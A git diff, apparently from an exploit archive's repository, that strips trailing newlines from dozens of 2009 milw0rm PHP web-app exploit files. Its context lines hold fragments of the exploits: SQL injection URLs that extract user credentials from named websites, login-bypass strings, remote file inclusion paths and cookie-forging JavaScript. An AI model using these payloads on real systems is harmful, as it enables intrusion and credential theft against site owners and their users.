--- a/platforms/php/webapps/7659.txt +++ b/platforms/php/webapps/7659.txt @@ -25,4 +25,4 @@ Password : Special : PARS! , Equilibrium , alpican , Cem , BlackFear , ALL Cyber-Warrior ########################### -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7660.txt b/platforms/php/webapps/7660.txt index 95f4bc9e5..6e0a5051c 100755 --- a/platforms/php/webapps/7660.txt +++ b/platforms/php/webapps/7660.txt @@ -23,4 +23,4 @@ http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0 [~] we are D-unit www.dz-security.net [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7663.txt b/platforms/php/webapps/7663.txt index d47e48340..be0da97b5 100755 --- a/platforms/php/webapps/7663.txt +++ b/platforms/php/webapps/7663.txt @@ -33,4 +33,4 @@ http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=9999 [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7664.pl b/platforms/php/webapps/7664.pl index 2040ac5d1..dcb98e3e6 100755 --- a/platforms/php/webapps/7664.pl +++ b/platforms/php/webapps/7664.pl @@ -84,4 +84,4 @@ while ($pos <= 32) print "\n"; -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7667.txt b/platforms/php/webapps/7667.txt index 98f93ac4f..9eaab0109 100755 --- a/platforms/php/webapps/7667.txt +++ b/platforms/php/webapps/7667.txt @@ -21,4 +21,4 @@ www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+S 1.3.5 Simple Review is a Review component for the Mambo CMS -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7668.pl b/platforms/php/webapps/7668.pl index 3d12086b6..d60357ea0 100755 --- a/platforms/php/webapps/7668.pl +++ b/platforms/php/webapps/7668.pl @@ -95,4 +95,4 @@ while (){ # __h0__ -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7669.pl b/platforms/php/webapps/7669.pl index 210eaf579..61e4fce1b 100755 --- a/platforms/php/webapps/7669.pl +++ b/platforms/php/webapps/7669.pl @@ -41,4 +41,4 @@ $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ else{print "\n[-] Exploit Bulunamadı...\n"; } -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7670.pl b/platforms/php/webapps/7670.pl index a824f09b3..25defd551 100755 --- a/platforms/php/webapps/7670.pl +++ b/platforms/php/webapps/7670.pl @@ -42,4 +42,4 @@ print "# Tebrikler Exploit Calisti! #\n\n"; else{print "\n[-] Exploit Bulunamadı...\n"; } -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7672.txt b/platforms/php/webapps/7672.txt index 0d65f0176..7835cbaa3 100755 --- a/platforms/php/webapps/7672.txt +++ b/platforms/php/webapps/7672.txt @@ -80,4 +80,4 @@ http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,co Greetz:MyGirlfriend... -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7674.txt b/platforms/php/webapps/7674.txt index db103faa4..2c8d566a4 100755 --- a/platforms/php/webapps/7674.txt +++ b/platforms/php/webapps/7674.txt @@ -26,4 +26,4 @@ javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "P [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/7678.txt b/platforms/php/webapps/7678.txt index d96615c97..7598356dc 100755 --- a/platforms/php/webapps/7678.txt +++ b/platforms/php/webapps/7678.txt @@ -115,4 +115,4 @@ [»] [»] [»]=============================================================================================================[»] -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7679.php b/platforms/php/webapps/7679.php index 2a101b37d..b78b829c3 100755 --- a/platforms/php/webapps/7679.php +++ b/platforms/php/webapps/7679.php @@ -68,4 +68,4 @@ ?> -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7680.txt b/platforms/php/webapps/7680.txt index ba9cfd294..4cb7dd178 100755 --- a/platforms/php/webapps/7680.txt +++ b/platforms/php/webapps/7680.txt @@ -24,4 +24,4 @@ http://www.khokhaoislandbeach.com/ezPack/?op=prog&mdfd=webboard&act=1&ID=1&qType Thx : milw0rm.Com $linux TheShadow Cybertrack Theoptix Skill Localhost Unknown ~null Nightmare Auto123 Xanax yuyuhaku ...l3od? $ L@M... Anuwat555 Dol2๛E๛MoN K33฿!N IT-DarK Team. All -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7682.txt b/platforms/php/webapps/7682.txt index 59365c9aa..e9d76830e 100755 --- a/platforms/php/webapps/7682.txt +++ b/platforms/php/webapps/7682.txt @@ -27,4 +27,4 @@ http://www.riotpix.com/board/ [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7683.pl b/platforms/php/webapps/7683.pl index e0007bd56..feb70b748 100755 --- a/platforms/php/webapps/7683.pl +++ b/platforms/php/webapps/7683.pl @@ -84,4 +84,4 @@ echo "\n"; ?> -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7686.txt b/platforms/php/webapps/7686.txt index f2be9d3f9..ab0100f91 100755 --- a/platforms/php/webapps/7686.txt +++ b/platforms/php/webapps/7686.txt @@ -14,4 +14,4 @@ _/ ___\/ __ \_ __ \ __\__ \ | |/ \ / __ |/ __ \\__ \\ __\ | \ [+] Password: anything [+] Have fun ^^ -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7687.txt b/platforms/php/webapps/7687.txt index 1e5105b8d..c392eb14e 100755 --- a/platforms/php/webapps/7687.txt +++ b/platforms/php/webapps/7687.txt @@ -40,4 +40,4 @@ http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]? Author: ahmadbady [kivi_hacker666@yahoo.com] --------------------------------------------------- -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7689.txt b/platforms/php/webapps/7689.txt index 6ee2fc371..ca740116a 100755 --- a/platforms/php/webapps/7689.txt +++ b/platforms/php/webapps/7689.txt @@ -25,4 +25,4 @@ Author: ahmadbady ************************************************* -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7690.txt b/platforms/php/webapps/7690.txt index a5596cee8..34ad0438b 100755 --- a/platforms/php/webapps/7690.txt +++ b/platforms/php/webapps/7690.txt @@ -23,4 +23,4 @@ Author: ahmadbady ************************************************* -# milw0rm.com [2009-01-06] +# milw0rm.com [2009-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/7691.php b/platforms/php/webapps/7691.php index 62a07358b..44b7f24a4 100755 --- a/platforms/php/webapps/7691.php +++ b/platforms/php/webapps/7691.php @@ -79,4 +79,4 @@ function browseFolder($host, $path, $folder){ ?> -# milw0rm.com [2009-01-07] +# milw0rm.com [2009-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/7697.txt b/platforms/php/webapps/7697.txt index 45d6257f7..3d106a222 100755 --- a/platforms/php/webapps/7697.txt +++ b/platforms/php/webapps/7697.txt @@ -23,4 +23,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-01-07] +# milw0rm.com [2009-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/7698.txt b/platforms/php/webapps/7698.txt index 590e22100..432f7ec6b 100755 --- a/platforms/php/webapps/7698.txt +++ b/platforms/php/webapps/7698.txt @@ -23,4 +23,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-01-07] +# milw0rm.com [2009-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/7699.txt b/platforms/php/webapps/7699.txt index 006e1cc2a..36a3647d7 100755 --- a/platforms/php/webapps/7699.txt +++ b/platforms/php/webapps/7699.txt @@ -38,4 +38,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-01-07] +# milw0rm.com [2009-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/7700.php b/platforms/php/webapps/7700.php index 8615062b9..6cefca172 100755 --- a/platforms/php/webapps/7700.php +++ b/platforms/php/webapps/7700.php @@ -144,4 +144,4 @@ function data_send ($host,$data) { return $html; } -# milw0rm.com [2009-01-08] +# milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/7703.txt b/platforms/php/webapps/7703.txt index 3b93f676d..5f0aecb91 100755 --- a/platforms/php/webapps/7703.txt +++ b/platforms/php/webapps/7703.txt @@ -36,4 +36,4 @@ Google Dark : inurl:/infusions/varcade/ ---------------------------------------------------------------- -# milw0rm.com [2009-01-08] +# milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/7704.pl b/platforms/php/webapps/7704.pl index 63cabf1b9..250d0e690 100755 --- a/platforms/php/webapps/7704.pl +++ b/platforms/php/webapps/7704.pl @@ -91,4 +91,4 @@ while ($pos <= 32) print "\n"; -# milw0rm.com [2009-01-08] +# milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/7705.pl b/platforms/php/webapps/7705.pl index 220be6219..78c0defa9 100755 --- a/platforms/php/webapps/7705.pl +++ b/platforms/php/webapps/7705.pl @@ -103,4 +103,4 @@ function data_send ($host,$data) { return $html; } -# milw0rm.com [2009-01-08] +# milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/7711.txt b/platforms/php/webapps/7711.txt index df66c8c4b..caa1861fa 100755 --- a/platforms/php/webapps/7711.txt +++ b/platforms/php/webapps/7711.txt @@ -21,4 +21,4 @@ Greetz: Anna...Strabica...Emetta... Vi Amo.. -- w00t Zone - w00tzone.org -# milw0rm.com [2009-01-09] +# milw0rm.com [2009-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/7716.pl b/platforms/php/webapps/7716.pl index 5ee814b8a..514d5fbae 100755 --- a/platforms/php/webapps/7716.pl +++ b/platforms/php/webapps/7716.pl @@ -34,4 +34,4 @@ print "# Tebrikler Exploit Calisti! #\n\n"; else{print "\n[-] Exploit Bulunamadı...\n"; } -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7717.pl b/platforms/php/webapps/7717.pl index 6708a098e..f6578367d 100755 --- a/platforms/php/webapps/7717.pl +++ b/platforms/php/webapps/7717.pl @@ -34,4 +34,4 @@ print "# Tebrikler Exploit Calisti! #\n\n"; else{print "\n[-] Exploit Bulunamadı...\n"; } -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7718.txt b/platforms/php/webapps/7718.txt index b28df6999..a2cd044a7 100755 --- a/platforms/php/webapps/7718.txt +++ b/platforms/php/webapps/7718.txt @@ -17,4 +17,4 @@ joomla target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union tested page http://www.flairsoft.net/main/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0 -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7719.txt b/platforms/php/webapps/7719.txt index 5cedb0fa9..cfd336e4d 100755 --- a/platforms/php/webapps/7719.txt +++ b/platforms/php/webapps/7719.txt @@ -42,4 +42,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7722.txt b/platforms/php/webapps/7722.txt index bb924624f..702c4e26f 100755 --- a/platforms/php/webapps/7722.txt +++ b/platforms/php/webapps/7722.txt @@ -15,4 +15,4 @@ http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(g Credits: Glafkos Charalambous glafkos [at] astalavista [dot] com -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7723.txt b/platforms/php/webapps/7723.txt index 6dfbbad5b..aff845f65 100755 --- a/platforms/php/webapps/7723.txt +++ b/platforms/php/webapps/7723.txt @@ -82,4 +82,4 @@ http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foro -={[unica_inc algún dia estaremos juntos]}=- -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7724.php b/platforms/php/webapps/7724.php index 594aa6e2c..0f2b1967b 100755 --- a/platforms/php/webapps/7724.php +++ b/platforms/php/webapps/7724.php @@ -74,4 +74,4 @@ while ($pos <= 32) echo "\n\n"; -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7725.txt b/platforms/php/webapps/7725.txt index ee290ebdc..8df4d0c11 100755 --- a/platforms/php/webapps/7725.txt +++ b/platforms/php/webapps/7725.txt @@ -28,4 +28,4 @@ demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/ demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/* -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7726.txt b/platforms/php/webapps/7726.txt index 4a43d65ab..3e6dfcc00 100755 --- a/platforms/php/webapps/7726.txt +++ b/platforms/php/webapps/7726.txt @@ -24,4 +24,4 @@ And you will be logged in. ############################################################################################# -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7728.txt b/platforms/php/webapps/7728.txt index e22602c59..5e0af9e9c 100755 --- a/platforms/php/webapps/7728.txt +++ b/platforms/php/webapps/7728.txt @@ -22,4 +22,4 @@ Exploit: ' or '1=1 Greetz: EdGaR :P -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7729.txt b/platforms/php/webapps/7729.txt index 185c8a31d..cedb96a74 100755 --- a/platforms/php/webapps/7729.txt +++ b/platforms/php/webapps/7729.txt @@ -12,4 +12,4 @@ PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability [+]Note : Bugun DoÄŸum Günüm :) ---------------------------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7730.txt b/platforms/php/webapps/7730.txt index 07c0404e2..c50352c85 100755 --- a/platforms/php/webapps/7730.txt +++ b/platforms/php/webapps/7730.txt @@ -31,4 +31,4 @@ ALL www.Snakespc.com/SC >>>> Members Str0ke ....Milw0rm ================================================================== ÇáäÜÜÜÜÕÑ ÍáíÝäÜÜÜÜÇ íÇ ÛÜÜÜÜÜÒÉ ==================================================== -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7731.txt b/platforms/php/webapps/7731.txt index a5b86e9c2..b61499c33 100755 --- a/platforms/php/webapps/7731.txt +++ b/platforms/php/webapps/7731.txt @@ -57,4 +57,4 @@ ******************************************************************************************* -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7732.php b/platforms/php/webapps/7732.php index 10710b08b..8baa4c3cf 100755 --- a/platforms/php/webapps/7732.php +++ b/platforms/php/webapps/7732.php @@ -46,4 +46,4 @@ else ?> -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7733.txt b/platforms/php/webapps/7733.txt index 970964076..7f0d81b65 100755 --- a/platforms/php/webapps/7733.txt +++ b/platforms/php/webapps/7733.txt @@ -42,4 +42,4 @@ There is an include of a variable coming from GET --> $language [/END] -# milw0rm.com [2009-01-11] +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/7734.txt b/platforms/php/webapps/7734.txt index f878640b6..12f9c2326 100755 --- a/platforms/php/webapps/7734.txt +++ b/platforms/php/webapps/7734.txt @@ -39,4 +39,4 @@ ######################################## -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/7735.pl b/platforms/php/webapps/7735.pl index 522c78267..470fe68ee 100755 --- a/platforms/php/webapps/7735.pl +++ b/platforms/php/webapps/7735.pl @@ -195,4 +195,4 @@ print "\n[-] Attacking code link recovery...\n"; brute(); } -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/7738.txt b/platforms/php/webapps/7738.txt index 1b7bd6093..aaf4c6843 100755 --- a/platforms/php/webapps/7738.txt +++ b/platforms/php/webapps/7738.txt @@ -22,4 +22,4 @@ http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+un Greetz: Exploit.In -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/774.pl b/platforms/php/webapps/774.pl index 6f4f593e3..f17a374c9 100755 --- a/platforms/php/webapps/774.pl +++ b/platforms/php/webapps/774.pl @@ -50,4 +50,4 @@ close ($remote); print "\n\n--- done ---\n"; -# milw0rm.com [2005-01-25] +# milw0rm.com [2005-01-25] \ No newline at end of file diff --git a/platforms/php/webapps/7740.txt b/platforms/php/webapps/7740.txt index 6aa2a9cae..775a926f3 100755 --- a/platforms/php/webapps/7740.txt +++ b/platforms/php/webapps/7740.txt @@ -27,4 +27,4 @@ Author: ahmadbady [kivi_hacker666@yahoo.com] ************************************************** -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/7743.txt b/platforms/php/webapps/7743.txt index 374f766fd..31bb8149f 100755 --- a/platforms/php/webapps/7743.txt +++ b/platforms/php/webapps/7743.txt @@ -30,4 +30,4 @@ http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?] Author: ahmadbady [kivi_hacker666@yahoo.com] --------------------------------------------------- -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/7746.txt b/platforms/php/webapps/7746.txt index e480af17a..34a201f81 100755 --- a/platforms/php/webapps/7746.txt +++ b/platforms/php/webapps/7746.txt @@ -38,4 +38,4 @@ http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id= #[!] Free Palestine ############################## -# milw0rm.com [2009-01-13] +# milw0rm.com [2009-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/7758.txt b/platforms/php/webapps/7758.txt index 8cd819a96..aea5ecdf7 100755 --- a/platforms/php/webapps/7758.txt +++ b/platforms/php/webapps/7758.txt @@ -21,4 +21,4 @@ [+] Username: x' OR 'x' = 'x'# [+] Password: anything -# milw0rm.com [2009-01-13] +# milw0rm.com [2009-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/7759.txt b/platforms/php/webapps/7759.txt index e67f706b6..f7babe68e 100755 --- a/platforms/php/webapps/7759.txt +++ b/platforms/php/webapps/7759.txt @@ -29,4 +29,4 @@ [+] Username: x' OR 'x' = 'x'# [+] Password: anything -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7764.txt b/platforms/php/webapps/7764.txt index e7db61c04..0ba58e894 100755 --- a/platforms/php/webapps/7764.txt +++ b/platforms/php/webapps/7764.txt @@ -46,4 +46,4 @@ http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_webblogmanager.asp&meta= -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7775.txt b/platforms/php/webapps/7775.txt index 600f618bf..727617a2a 100755 --- a/platforms/php/webapps/7775.txt +++ b/platforms/php/webapps/7775.txt @@ -36,4 +36,4 @@ ######################################## -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7777.txt b/platforms/php/webapps/7777.txt index 0f7f46bbc..6748452f8 100755 --- a/platforms/php/webapps/7777.txt +++ b/platforms/php/webapps/7777.txt @@ -46,4 +46,4 @@ ######################################## -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7778.txt b/platforms/php/webapps/7778.txt index c4aee3e72..a951cb63c 100755 --- a/platforms/php/webapps/7778.txt +++ b/platforms/php/webapps/7778.txt @@ -76,4 +76,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7780.pl b/platforms/php/webapps/7780.pl index b68f600c4..f0d68ec6d 100755 --- a/platforms/php/webapps/7780.pl +++ b/platforms/php/webapps/7780.pl @@ -208,4 +208,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7786.txt b/platforms/php/webapps/7786.txt index 21229fa3e..b81ddf951 100755 --- a/platforms/php/webapps/7786.txt +++ b/platforms/php/webapps/7786.txt @@ -49,4 +49,4 @@ it's obvious that the file exists, so it will be included. [/END] -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7787.txt b/platforms/php/webapps/7787.txt index 1911bc451..d61f5c3aa 100755 --- a/platforms/php/webapps/7787.txt +++ b/platforms/php/webapps/7787.txt @@ -43,4 +43,4 @@ Admin Login-> # Im not Hacker! -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/7792.txt b/platforms/php/webapps/7792.txt index 15067dc60..6a176e00e 100755 --- a/platforms/php/webapps/7792.txt +++ b/platforms/php/webapps/7792.txt @@ -64,4 +64,4 @@ bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo= phpinfo() can be executed ***************************/ -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7793.php b/platforms/php/webapps/7793.php index adfbc101a..5b26dbeb4 100755 --- a/platforms/php/webapps/7793.php +++ b/platforms/php/webapps/7793.php @@ -65,4 +65,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7795.txt b/platforms/php/webapps/7795.txt index 139405dcf..cff260e81 100755 --- a/platforms/php/webapps/7795.txt +++ b/platforms/php/webapps/7795.txt @@ -36,4 +36,4 @@ ######################################## -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7796.txt b/platforms/php/webapps/7796.txt index 99ee2bac0..3381a9c8c 100755 --- a/platforms/php/webapps/7796.txt +++ b/platforms/php/webapps/7796.txt @@ -488,4 +488,4 @@ Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ ---------------------------------- [ EOF ] --------------------------------- -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7797.php b/platforms/php/webapps/7797.php index 4649daaba..fe2602e12 100755 --- a/platforms/php/webapps/7797.php +++ b/platforms/php/webapps/7797.php @@ -82,4 +82,4 @@ echo decrypt ($pass) . "\n\n"; ?> -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7798.txt b/platforms/php/webapps/7798.txt index a24379f1f..bd010a192 100755 --- a/platforms/php/webapps/7798.txt +++ b/platforms/php/webapps/7798.txt @@ -16,4 +16,4 @@ http://www.lordblessthee.com/bible/readbible.php?version=kjv%20union%20select%20 #greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/7805.txt b/platforms/php/webapps/7805.txt index 993b81f0c..4b441605f 100755 --- a/platforms/php/webapps/7805.txt +++ b/platforms/php/webapps/7805.txt @@ -16,4 +16,4 @@ http://site.com/rankup.asp?siteID=>>> Members Str0ke ....Milw0rm ==================================================================GAZA============================================================ -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7829.txt b/platforms/php/webapps/7829.txt index 68e8ef278..d43f10e2b 100755 --- a/platforms/php/webapps/7829.txt +++ b/platforms/php/webapps/7829.txt @@ -71,4 +71,4 @@ it's values directly in html code. [/END] -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7830.txt b/platforms/php/webapps/7830.txt index df713f975..cd75eb28d 100755 --- a/platforms/php/webapps/7830.txt +++ b/platforms/php/webapps/7830.txt @@ -31,4 +31,4 @@ Resulting in: We are then logged in with administrative privileges. -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7831.txt b/platforms/php/webapps/7831.txt index 6864ff24d..762d8ac08 100755 --- a/platforms/php/webapps/7831.txt +++ b/platforms/php/webapps/7831.txt @@ -31,4 +31,4 @@ echo("
$strD ?> -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7832.txt b/platforms/php/webapps/7832.txt index 7b3cda487..39c964070 100755 --- a/platforms/php/webapps/7832.txt +++ b/platforms/php/webapps/7832.txt @@ -21,4 +21,4 @@ and otherwise submit the form as usual. Obviously there are other vectors, but t Whenever that particular ad is viewed is viewed, the script is executed. -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7833.php b/platforms/php/webapps/7833.php index 8dc1c1a72..3d53d20f5 100755 --- a/platforms/php/webapps/7833.php +++ b/platforms/php/webapps/7833.php @@ -65,4 +65,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7834.txt b/platforms/php/webapps/7834.txt index ba873a54e..7480c5cd7 100755 --- a/platforms/php/webapps/7834.txt +++ b/platforms/php/webapps/7834.txt @@ -21,4 +21,4 @@ When making a new comment, we simply fill the "posted" hidden field's value with Whenever that comment is viewed, the script is executed. -# milw0rm.com [2009-01-19] +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/7835.htm b/platforms/php/webapps/7835.htm index b86615fea..7d06a02f5 100755 --- a/platforms/php/webapps/7835.htm +++ b/platforms/php/webapps/7835.htm @@ -43,4 +43,4 @@ Post ID:

-# milw0rm.com [2009-01-20] +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/7836.txt b/platforms/php/webapps/7836.txt index 6589568da..063609c2f 100755 --- a/platforms/php/webapps/7836.txt +++ b/platforms/php/webapps/7836.txt @@ -29,4 +29,4 @@ ALL www.Snakespc.com/sc >>>> Members Str0ke ....Milw0rm ==================================================================GAZA============================================================ -# milw0rm.com [2009-01-20] +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/7837.pl b/platforms/php/webapps/7837.pl index ee5dc1165..c10d3f210 100755 --- a/platforms/php/webapps/7837.pl +++ b/platforms/php/webapps/7837.pl @@ -215,4 +215,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-01-20] +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/7838.txt b/platforms/php/webapps/7838.txt index 53064d95c..f43a07026 100755 --- a/platforms/php/webapps/7838.txt +++ b/platforms/php/webapps/7838.txt @@ -9,4 +9,4 @@ Script : Dodo's Quiz Script Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile] ################################################# -# milw0rm.com [2009-01-20] +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/7840.pl b/platforms/php/webapps/7840.pl index 502aaf7c4..bd5e9360f 100755 --- a/platforms/php/webapps/7840.pl +++ b/platforms/php/webapps/7840.pl @@ -30,4 +30,4 @@ print "||> Exploit done! ;-) <||\n\n"; else{print "\n||> Exploit failed! :-( <||\n"; } -# milw0rm.com [2009-01-21] +# milw0rm.com [2009-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/7841.txt b/platforms/php/webapps/7841.txt index bf8acb494..8e25c9d57 100755 --- a/platforms/php/webapps/7841.txt +++ b/platforms/php/webapps/7841.txt @@ -40,4 +40,4 @@ <--[ sec-geeks.com ]--> -# milw0rm.com [2009-01-21] +# milw0rm.com [2009-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/7844.py b/platforms/php/webapps/7844.py index 